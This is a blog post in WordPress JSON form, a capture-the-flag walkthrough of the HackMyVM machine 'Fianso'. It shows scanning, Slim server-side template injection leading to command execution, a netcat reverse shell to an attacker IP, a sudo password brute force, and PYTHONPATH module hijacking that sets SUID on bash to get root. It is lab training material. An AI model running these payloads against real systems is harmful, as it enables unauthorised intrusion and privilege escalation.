{"id":771,"date":"2024-08-06T12:13:54","date_gmt":"2024-08-06T04:13:54","guid":{"rendered":"http:\/\/162.14.82.114\/?p=771"},"modified":"2024-08-06T12:13:54","modified_gmt":"2024-08-06T04:13:54","slug":"hmv-_-fianso","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/771\/08\/06\/2024\/","title":{"rendered":"hmv[-_-]Fianso"},"content":{"rendered":"<h1>Fianso<\/h1>\n<p><div class='fancybox-wrapper' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208844.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208844.png\" alt=\"image-20240710135425283\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208846.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208846.png\" alt=\"image-20240806100714207\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 172.20.10.4:22\nOpen 172.20.10.4:8000\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 ee:71:f4:ad:a0:71:e1:35:19:86:ab:c8:e6:be:36:17 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7WSYGSeML+7fdCGSg\/SceCebE64ubFkH1Lz8A+lQ0AVyfX53bRJd5tLTsioGIktkCOADunR5OnBVsYENJELoRyLBIKVOUM47PZezmL5YMTqsfmkLlrvxmxh1qIePM4BWN41WtRVj5UeVJbonyfg+XSYcOSvexW0ecjgVsZF+3L+oGHY\/HVN6hVjbYCcgzjagL0+yjUUcsqsZiKJTRAwKDW\/0KTzNpl6DR3+V\/kI9IqtMVv1b5HiGEVGDfFG43aKBCCYN6Z5UJ9LQxzn1ek5qm+itm2HBRsx1gyP5090iWq7JaienHNu+SF5INC+0gONeDNQbGe2DmFOP4DmRVN2xab6yOtad8RUeuXV9Ai34oQ5C5Sb05359r7hIiUbmW8HUdyno0MJWzD3qMaI4vjzu8LjHBFgLLr46W85kUfGe4UNRw5oyny06dSykdlUbr5UqNqhXy0BJJ+IVAjuGRK+GJp2rG50+XtiNAl+QVmXiMPN3ZrnDH+NFNAPxx1XVulJc=\n|   256 40:1c:c3:da:83:d7:2f:60:cb:12:47:3b:02:67:04:14 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCp+K99CwZe+fU+TRLU\/qS7AhRI9WH4O\/ZvweFt5WrggQF7uNqBi\/CsuNuz7ZyuQhqKLY8ksBNK4Sl0zhvvuRjA=\n|   256 1a:69:a7:f9:dc:a5:49:ff:d2:7d:ce:45:97:6d:8a:b9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPnpl12UICtoiToIfyj1uu5B6BjKmFcThog0q8T36RAr\n8000\/tcp open  http    syn-ack WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-server-header: WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)\n|_http-title: Site doesn&#039;t have a title (text\/html;charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:8000 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n^C\n[!] 
Keyboard interrupt detected, terminating.<\/code><\/pre>\n<p>I could not be bothered to finish the scan; if I run out of ideas later I will scan again...<\/p>\n<h2>Exploitation<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl http:\/\/$IP:8000 \n&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;&lt;First&gt;Name:&lt;br&gt;&lt;br&gt;&lt;\/First&gt;&lt;input type=&quot;text&quot; name=&quot;name&quot; value=&quot;&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Submit&quot;&gt;&lt;\/form&gt;&lt;h2&gt;Hello  !&lt;\/h2&gt;&lt;\/body&gt;&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ whatweb http:\/\/$IP:8000\nhttp:\/\/172.20.10.4:8000 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)], IP[172.20.10.4], Ruby[2.7.4,WEBrick\/1.6.1], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]<\/code><\/pre>\n<p><div class='fancybox-wrapper' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208847.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208847.png\" alt=\"image-20240806101546276\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h3>SSTI<\/h3>\n<p>This looks like some kind of template injection, so test for it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ tinja url -u &quot;http:\/\/$IP:8000\/&quot; -d &quot;name=abc&quot;    \nTInjA v1.1.3 started at 2024-08-05_22-31-59\n\nAnalyzing URL(1\/1): http:\/\/172.20.10.4:8000\/\n===============================================================\nStatus code 200\nAnalyzing post parameter  name  =&gt;  abc\n[*] Value  AXML6ULPJ5KXI5EX  of POST parameter  name  is being reflected 1 time(s) in the response body\n\n[!] The polyglot &lt;%&#039;${{\/#{@}}%&gt;{{ triggered an error: Status Code 500\n[*] The polyglot p &quot;&gt;[[${{1}}]] returned the response(s) [unmodified]\n[!] The polyglot &lt;%=1%&gt;@*#{1} was rendered in a modified way: [&lt;%=1%&gt;@*1]\n[*] The polyglot &lt;%=1%&gt;@*#{1} returned the response(s) [&lt;%=1%&gt;@*1]\n[*] The polyglot {##}\/*{{.}}*\/ returned the response(s) [unmodified]\n\nA template injection was detected and the template engine is now being identified.\n[*] The polyglot a&quot;&gt;##[[${1}]] returned the response(s) [unmodified]\n[*] The polyglot \/\/*&lt;!--{##&lt;%=1%&gt;{{!--{{1}}--}}--&gt;*\/#} returned the response(s) [unmodified]\n\nVerifying the template injection by issuing template expressions tailored to the specific template engine.\n[*] Verifying Slim.\n[*] The polyglot #{ 7*7 } returned the response(s) [49]\n[+] Slim was identified (certainty: Very High)\n\n===============================================================\n\nSuccessfully finished the scan\n[+] Suspected template injections: 1\n[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty\n\nDuration: 551.585857ms\nAverage polyglots sent per user input: 6\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP:8000\/&quot; -d &quot;name=#{ 7*7 }&quot; | 
html2text\nName:\n[name                ][Submit]\n***** Hello 49 ! *****<\/code><\/pre>\n<p>Then, following this reference:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#slim-ruby\">https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#slim-ruby<\/a><\/p>\n<\/blockquote>\n<p>Going a step further, try executing a shell command from inside the interpolation:<\/p>\n<pre><code class=\"language-bash\">#{ %x|env| }\nHello HOME=\/home\/sofiane LOGNAME=sofiane PATH=\/usr\/bin:\/bin LANG=en_US.UTF-8 SHELL=\/bin\/sh PWD=\/home\/sofiane !<\/code><\/pre>\n<p>System commands can be executed, so spawn a reverse shell!<\/p>\n<pre><code class=\"language-bash\">#{ %x|whoami;id| }\nHello sofiane uid=1001(sofiane) gid=1001(sofiane) groups=1001(sofiane) !\n\n#{ %x|nc -e \/bin\/bash 172.20.10.8 1234| }<\/code><\/pre>\n<p><div class='fancybox-wrapper' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208848.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208848.png\" alt=\"image-20240806104437035\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) sofiane@fianso:\/home\/sofiane$ ls -la\ntotal 36\ndrwxr-xr-x 4 sofiane sofiane 4096 Dec 24  2022 .\ndrwxr-xr-x 3 root    root    4096 Dec 13  2022 ..\nlrwxrwxrwx 1 root    root       9 Dec 13  2022 
.bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 sofiane sofiane  220 Dec 13  2022 .bash_logout\n-rw-r--r-- 1 sofiane sofiane 3526 Dec 13  2022 .bashrc\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 21  2022 .config\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 18  2022 .local\n-rw-r--r-- 1 sofiane sofiane  807 Dec 13  2022 .profile\n-rwx------ 1 sofiane sofiane   33 Dec 24  2022 user.txt\n-rw------- 1 sofiane sofiane   52 Dec 24  2022 .Xauthority\n(remote) sofiane@fianso:\/home\/sofiane$ cat user.txt \ndd61014e5d119683f9fc798439cd3916\n(remote) sofiane@fianso:\/home\/sofiane$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n    (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n(remote) sofiane@fianso:\/home\/sofiane$ cat \/opt\/harness\n#! \/bin\/bash\n\nclear -x\npass=$(&lt;\/opt\/passwordBox\/password)\ninfo=&quot;$(hostname):$(whoami):$pass&quot; \nconf=\/opt\/config.conf\n\n#touch &amp; chmod &amp; echo instead echo &amp; chmod for race condition protection from user. 
\ntouch $conf\nchmod 700 $conf\necho $info &gt; $conf\n\necho -e &quot;\\nAuthentication to manage music collection.\\n&quot;\necho -e &quot;\\n$(date &quot;+Date: %D&quot;)\\nUser: ${info:7:4}\\nHost: ${info%%:*}\\n&quot;\n\nread -ep &quot;Master&#039;s password: &quot; passInput\nif [[ $passInput == $pass ]] ; then \necho &quot;sofiane ALL=(ALL:ALL) NOPASSWD:SETENV: \/usr\/bin\/beet &quot; &gt;&gt; \/etc\/sudoers \necho -e &quot;Sudo rights granted !\\n&quot;\nelse\necho -e &quot;Wrong password\\n&quot; &amp;&amp; exit 1\nfi\n(remote) sofiane@fianso:\/home\/sofiane$ file \/usr\/bin\/beet\n\/usr\/bin\/beet: symbolic link to ..\/share\/beets\/beet<\/code><\/pre>\n<h3>Brute-forcing the Password<\/h3>\n<p>Running it shows that a config file gets generated:<\/p>\n<pre><code class=\"language-bash\">(remote) sofiane@fianso:\/home\/sofiane$ sudo \/bin\/bash \/opt\/harness\nAuthentication to manage music collection.\n\nDate: 08\/06\/24\nUser: root\nHost: fianso\n\nMaster&#039;s password:\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/passwordBox\/password\nls: cannot access &#039;\/opt\/passwordBox\/password&#039;: Permission denied\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/config.conf\n-rwx------ 1 root root 43 Aug  6 04:54 \/opt\/config.conf<\/code><\/pre>\n<p>So the password is wrong. The config file is 43 bytes in total, of which the first 12 bytes are the fixed prefix <code>fianso:root:<\/code>; on top of that comes the behaviour of echo:<\/p>\n<blockquote>\n<p><code>echo<\/code> appends a newline to whatever it prints; with the <code>-n<\/code> option no newline is added.<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo &quot;test&quot; &gt; test1                                    
                       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo -n &quot;test&quot; &gt; test2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la test1 test2  \n-rw-r--r-- 1 kali kali 5 Aug  5 23:30 test1\n-rw-r--r-- 1 kali kali 4 Aug  5 23:30 test2<\/code><\/pre>\n<p>That makes 13 fixed bytes, leaving a 30-character password; try brute-forcing it as a weak password by looking for 30-character candidates in <code>rockyou<\/code>:<\/p>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ grep -E &#039;^.{30}$&#039; \/usr\/share\/wordlists\/rockyou.txt &gt; rockyou_30.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ nc -lp 8888 &lt; rockyou_30.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la rockyou_30.txt \n-rw-r--r-- 1 kali kali 22109 Aug  5 23:34 rockyou_30.txt<\/code><\/pre>\n<pre><code class=\"language-bash\"># fianso\n(remote) sofiane@fianso:\/home\/sofiane$ hostname\nfianso\n(remote) sofiane@fianso:\/home\/sofiane$ cd \/tmp\n(remote) sofiane@fianso:\/tmp$ cat &lt; \/dev\/tcp\/172.20.10.8\/8888 &gt; rockyou_30.txt\n^C\n(remote) sofiane@fianso:\/tmp$ ls -la\ntotal 60\ndrwxrwxrwt  9 root    root     4096 Aug  6 05:38 .\ndrwxr-xr-x 18 root    root     4096 Nov 14  2022 ..\ndrwxrwxrwt  2 root    root     4096 Aug  6 04:05 .font-unix\ndrwxrwxrwt  2 root    root     4096 Aug  6 04:05 .ICE-unix\n-rw-r--r--  1 sofiane sofiane 22109 Aug  6 05:38 rockyou_30.txt\ndrwx------  3 root    root     4096 Aug  6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-logind.service-LU0rnf\ndrwx------  3 root    root     4096 Aug  6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-timesyncd.service-2vutgi\ndrwxrwxrwt  2 root    root     4096 Aug  6 04:05 .Test-unix\ndrwxrwxrwt  2 root    
root     4096 Aug  6 04:05 .X11-unix\ndrwxrwxrwt  2 root    root     4096 Aug  6 04:05 .XIM-unix<\/code><\/pre>\n<p>Then brute-force it. Since all we need is for the check to pass once, the wordlist can simply be piped straight in:<\/p>\n<pre><code class=\"language-bash\">(remote) sofiane@fianso:\/tmp$ for i in $(cat .\/rockyou_30.txt); do echo $i | sudo \/bin\/bash \/opt\/harness; done\n.........\n(remote) sofiane@fianso:\/tmp$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n    (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n    (ALL : ALL) SETENV: NOPASSWD: \/usr\/bin\/beet\n(remote) sofiane@fianso:\/tmp$ cat \/usr\/bin\/beet\n#!\/usr\/bin\/python3\n# EASY-INSTALL-ENTRY-SCRIPT: &#039;beets==1.4.9&#039;,&#039;console_scripts&#039;,&#039;beet&#039;\n__requires__ = &#039;beets==1.4.9&#039;\nimport re\nimport sys\nfrom pkg_resources import load_entry_point\n\nif __name__ == &#039;__main__&#039;:\n    sys.argv[0] = re.sub(r&#039;(-script\\.pyw?|\\.exe)?$&#039;, &#039;&#039;, sys.argv[0])\n    sys.exit(\n        load_entry_point(&#039;beets==1.4.9&#039;, &#039;console_scripts&#039;, &#039;beet&#039;)()\n    )<\/code><\/pre>\n<h3>Hijacking Environment Variables<\/h3>\n<p>Since sudo lets us set environment variables here, we can try hijacking a library module via <code>PYTHONPATH<\/code> (the built-in <code>sys<\/code> module cannot be shadowed this way, but <code>re<\/code>, which beet imports, can):<\/p>\n<pre><code class=\"language-bash\">(remote) sofiane@fianso:\/tmp$ nano sys.py\n(remote) sofiane@fianso:\/tmp$ cat sys.py\nimport os\nos.system(&quot;chmod +s \/bin\/bash&quot;)\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nUsage: \n  beet COMMAND [ARGS...]\n  beet help COMMAND\n\nOptions:\n  --format-item=FORMAT_ITEM\n                        print with custom format\n  
--format-album=FORMAT_ALBUM\n                        print with custom format\n  -l LIBRARY, --library=LIBRARY\n                        library database file to use\n  -d DIRECTORY, --directory=DIRECTORY\n                        destination music directory\n  -v, --verbose         log more details (use twice for even more)\n  -c CONFIG, --config=CONFIG\n                        path to configuration file\n  -h, --help            show this help message and exit\n\nCommands:\n  config            show or edit the user configuration\n  fields            show fields available for queries and format strings\n  help (?)          give detailed help on a specific sub-command\n  import (imp, im)  import new music\n  list (ls)         query the library\n  modify (mod)      change metadata fields\n  move (mv)         move or copy items\n  remove (rm)       remove matching items from the library\n  stats             show statistics about the library or a query\n  update (upd, up)  update the library\n  version           output version information\n  write             write tag information to files\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ nano re.py\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nTraceback (most recent call last):\n  File &quot;\/usr\/bin\/beet&quot;, line 6, in &lt;module&gt;\n    from pkg_resources import load_entry_point\n  File &quot;\/usr\/lib\/python3\/dist-packages\/pkg_resources\/__init__.py&quot;, line 23, in &lt;module&gt;\n    import zipfile\n  File &quot;\/usr\/lib\/python3.9\/zipfile.py&quot;, line 7, in &lt;module&gt;\n    import importlib.util\n  File &quot;\/usr\/lib\/python3.9\/importlib\/util.py&quot;, line 2, in &lt;module&gt;\n    from . 
import abc\n  File &quot;\/usr\/lib\/python3.9\/importlib\/abc.py&quot;, line 17, in &lt;module&gt;\n    from typing import Protocol, runtime_checkable\n  File &quot;\/usr\/lib\/python3.9\/typing.py&quot;, line 2196, in &lt;module&gt;\n    Pattern = _alias(stdlib_re.Pattern, 1)\nAttributeError: module &#039;re&#039; has no attribute &#039;Pattern&#039;\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ bash -p\n(remote) root@fianso:\/tmp# cd ~\n(remote) root@fianso:\/home\/sofiane# whoami;id\nroot\nuid=1001(sofiane) gid=1001(sofiane) euid=0(root) egid=0(root) groups=0(root),1001(sofiane)\n(remote) root@fianso:\/home\/sofiane# cd \/root\n(remote) root@fianso:\/root# ls -la\ntotal 32\ndrwx------  5 root root 4096 Dec 24  2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14  2022 ..\nlrwxrwxrwx  1 root root    9 Dec 13  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  602 Dec 21  2022 .bashrc\ndrwxr-xr-x  3 root root 4096 Dec 24  2022 .config\ndrwxr-xr-x  3 root root 4096 Dec 13  2022 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rwx------  1 root root   33 Dec 24  2022 root.txt\ndrwx------  2 root root 4096 Dec 24  2022 .ssh<\/code><\/pre>\n<p>Success!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1Hf421f716\/\">https:\/\/www.bilibili.com\/video\/BV1Hf421f716\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Fianso\/Ctf.md\">https:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Fianso\/Ctf.md<\/a><\/p>\n<p><a href=\"https:\/\/mikannse.space\/2024\/02\/09\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E5%85%AB%E4%B8%83)%E4%B9%8BHMVFianso\/\">https:\/\/mikannse.space\/2024\/02\/09\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E5%85%AB%E4%B8%83)%E4%B9%8BHMVFianso\/<\/a><\/p>\n<p><a 
href=\"https:\/\/nepcodex.com\/2023\/01\/hackmyvm-fianso-walkthrough-writeup\/\">https:\/\/nepcodex.com\/2023\/01\/hackmyvm-fianso-walkthrough-writeup\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fianso Information Gathering Port Scan \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-771","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/771","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=771"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/771\/revisions"}],"predecessor-version":[{"id":772,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/771\/revisions\/772"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=771"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=771"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=771"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}